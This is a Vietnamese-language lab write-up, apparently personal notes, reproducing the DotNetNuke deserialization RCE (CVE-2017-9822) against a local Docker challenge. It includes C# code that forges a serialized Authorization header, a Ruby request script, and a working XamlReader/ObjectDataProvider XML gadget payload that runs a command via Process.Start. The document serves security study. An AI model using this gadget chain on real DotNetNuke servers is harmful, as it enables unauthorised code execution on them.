# CVE-2017-9822 DotNetNuke RCE ## Download - https://github.com/abhisek/pwnworks/tree/master/challenges/dotnet-deserialization ``` $ docker build -t dotnet-serial-pwn . $ docker run --rm --name dotnet-serial-pwn -p 9000:9000 dotnet-serial-pwn ``` nếu lỗi đổi sang LF ![image](https://hackmd.io/_uploads/Hy8ICeJyZl.png) ## Lý thuyết - https://cert.360.cn/warning/detail?id=e689288863456481733e01b093c986b6 ## Khai thác code ký authen ```C# using System; using System.Collections; using System.IO; using System.Runtime.Serialization.Formatters.Binary; using System.Text; class MakeAuthHeader { static void Main() { // Token mà server đang kiểm tra Hashtable h = new Hashtable(); h["token"] = "5daba5b0885a65b222216bf46b083538"; // Serialize Hashtable bằng BinaryFormatter -> byte[] BinaryFormatter bf = new BinaryFormatter(); byte[] serialized; using (MemoryStream ms = new MemoryStream()) { bf.Serialize(ms, h); serialized = ms.ToArray(); } // Inner base64 (chứa binary formatter payload) string innerBase64 = Convert.ToBase64String(serialized); // Bọc innerBase64 vào XML theo định dạng server mong đợi string xml = $"<AuthData><Item key=\"basic\" type=\"BinaryType\">{innerBase64}</Item></AuthData>"; // Base64 toàn bộ XML -> đây là giá trị header Authorization cần dùng string header = Convert.ToBase64String(Encoding.UTF8.GetBytes(xml)); Console.WriteLine(header); } } ``` ![image](https://hackmd.io/_uploads/HyqQYfJkWl.png) ``` PEF1dGhEYXRhPjxJdGVtIGtleT0iYmFzaWMiIHR5cGU9IkJpbmFyeVR5cGUiPkFBRUFBQUQvLy8vL0FRQUFBQUFBQUFBRUFRQUFBQnhUZVhOMFpXMHVRMjlzYkdWamRHbHZibk11U0dGemFIUmhZbXhsQndBQUFBcE1iMkZrUm1GamRHOXlCMVpsY25OcGIyNElRMjl0Y0dGeVpYSVFTR0Z6YUVOdlpHVlFjbTkyYVdSbGNnaElZWE5vVTJsNlpRUkxaWGx6QmxaaGJIVmxjd0FBQXdNQUJRVUxDQnhUZVhOMFpXMHVRMjlzYkdWamRHbHZibk11U1VOdmJYQmhjbVZ5SkZONWMzUmxiUzVEYjJ4c1pXTjBhVzl1Y3k1SlNHRnphRU52WkdWUWNtOTJhV1JsY2dqc1VUZy9BUUFBQUFvS0F3QUFBQWtDQUFBQUNRTUFBQUFRQWdBQUFBRUFBQUFHQkFBQUFBVjBiMnRsYmhBREFBQUFBUUFBQUFZRkFBQUFJRFZrWVdKaE5XSXdPRGcxWVRZMVlqSXlNakl4Tm1KbU5EWmlNRGd6TlRNNEN3PT08L0l0ZW0+PC9BdXRoRGF0YT4= ``` ![image](https://hackmd.io/_uploads/ByDjFz11bx.png) ![image](https://hackmd.io/_uploads/B14htMJ1-e.png) ```http POST /products HTTP/1.1 Host: 127.0.0.1:9000 Authorization: PEF1dGhEYXRhPjxJdGVtIGtleT0iYmFzaWMiIHR5cGU9IkJpbmFyeVR5cGUiPkFBRUFBQUQvLy8vL0FRQUFBQUFBQUFBRUFRQUFBQnhUZVhOMFpXMHVRMjlzYkdWamRHbHZibk11U0dGemFIUmhZbXhsQndBQUFBcE1iMkZrUm1GamRHOXlCMVpsY25OcGIyNElRMjl0Y0dGeVpYSVFTR0Z6YUVOdlpHVlFjbTkyYVdSbGNnaElZWE5vVTJsNlpRUkxaWGx6QmxaaGJIVmxjd0FBQXdNQUJRVUxDQnhUZVhOMFpXMHVRMjlzYkdWamRHbHZibk11U1VOdmJYQmhjbVZ5SkZONWMzUmxiUzVEYjJ4c1pXTjBhVzl1Y3k1SlNHRnphRU52WkdWUWNtOTJhV1JsY2dqc1VUZy9BUUFBQUFvS0F3QUFBQWtDQUFBQUNRTUFBQUFRQWdBQUFBRUFBQUFHQkFBQUFBVjBiMnRsYmhBREFBQUFBUUFBQUFZRkFBQUFJRFZrWVdKaE5XSXdPRGcxWVRZMVlqSXlNakl4Tm1KbU5EWmlNRGd6TlRNNEN3PT08L0l0ZW0+PC9BdXRoRGF0YT4= Content-Type: application/xml Content-Length: 94 <Product><Name>Ptest</Name><Description>t</Description><ImageURL>NA</ImageURL></Product> ``` ![image](https://hackmd.io/_uploads/ByAHlLx1-e.png) ![image](https://hackmd.io/_uploads/rJLVx8xy-e.png) ![image](https://hackmd.io/_uploads/BylBgLgkbe.png) ``` require 'uri' require 'net/http' require 'base64' def get_payload() data = File.binread(ARGV[0] || "testxml.xml") return Base64.strict_encode64(data) end if __FILE__ == $0 uri = ::URI.parse("http://127.0.0.1:8000/products") http = Net::HTTP.new(uri.host,uri.port) request = Net::HTTP::Post.new(uri.path) request["Authorization"] = get_payload() request.body = File.binread("product.xml") res = http.request(request) puts res.body end ``` ```xml <?xml version="1.0"?> <AuthData> <Item key="AAA" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"> <ExpandedWrapperOfXamlReaderObjectDataProvider> <ExpandedElement/> <ProjectedProperty0> <MethodName>Parse</MethodName> <MethodParameters> <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string"> &lt;ResourceDictionary xmlns=&quot;http://schemas.microsoft.com/winfx/2006/xaml/presentation&quot; xmlns:x=&quot;http://schemas.microsoft.com/winfx/2006/xaml&quot; xmlns:System=&quot;clr-namespace:System;assembly=mscorlib&quot; xmlns:Diag=&quot;clr-namespace:System.Diagnostics;assembly=system&quot;&gt; &lt;ObjectDataProvider x:Key=&quot;LaunchCmd&quot; ObjectType=&quot;{x:Type Diag:Process}&quot; MethodName=&quot;Start&quot;&gt; &lt;ObjectDataProvider.MethodParameters&gt; &lt;System:String&gt;touch&lt;/System:String&gt; &lt;System:String&gt;/tmp/PWN&lt;/System:String&gt; &lt;/ObjectDataProvider.MethodParameters&gt; &lt;/ObjectDataProvider&gt; &lt;/ResourceDictionary&gt; </anyType> </MethodParameters> <ObjectInstance xsi:type="XamlReader"></ObjectInstance> </ProjectedProperty0> </ExpandedWrapperOfXamlReaderObjectDataProvider> </Item> </AuthData> ```